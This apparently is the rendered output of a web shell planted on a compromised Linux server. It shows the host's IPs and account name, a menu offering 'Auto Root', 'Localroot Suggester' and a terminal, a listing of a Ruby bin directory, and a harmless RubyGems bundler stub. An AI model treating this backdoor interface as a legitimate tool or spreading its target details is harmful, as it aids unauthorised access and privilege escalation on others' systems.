Linux srv25.usacloudserver.us 5.14.0-570.39.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Sep 4 05:08:52 EDT 2025 x86_64
LiteSpeed
Server IP : 23.137.84.82 & Your IP : 216.73.216.127
Domains :
Cant Read [ /etc/named.conf ]
User : epicgamerzoneco
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby30 /
bin /
Delete
Unzip
Name
Size
Permission
Date
Action
bundle
537
B
-rwxr-xr-x
2024-06-26 14:24
bundler
539
B
-rwxr-xr-x
2024-06-26 14:24
erb
515
B
-rwxr-xr-x
2024-06-26 14:24
gem
553
B
-rwxr-xr-x
2024-06-26 14:24
rackup
550
B
-rwxr-xr-x
2023-09-21 06:30
rake
538
B
-rwxr-xr-x
2024-06-26 14:24
rdoc
521
B
-rwxr-xr-x
2024-06-26 14:24
ri
517
B
-rwxr-xr-x
2024-06-26 14:24
ruby
15.27
KB
-rwxr-xr-x
2024-06-26 14:24
Save
Rename
#!/opt/alt/ruby30/bin/ruby # # This file was generated by RubyGems. # # The application 'bundler' is installed as part of a gem, and # this file is here to facilitate running it. # require 'rubygems' version = ">= 0.a" str = ARGV.first if str str = str.b[/\A_(.*)_\z/, 1] if str and Gem::Version.correct?(str) version = str ARGV.shift end end if Gem.respond_to?(:activate_bin_path) load Gem.activate_bin_path('bundler', 'bundle', version) else gem "bundler", version load Gem.bin_path("bundler", "bundle", version) end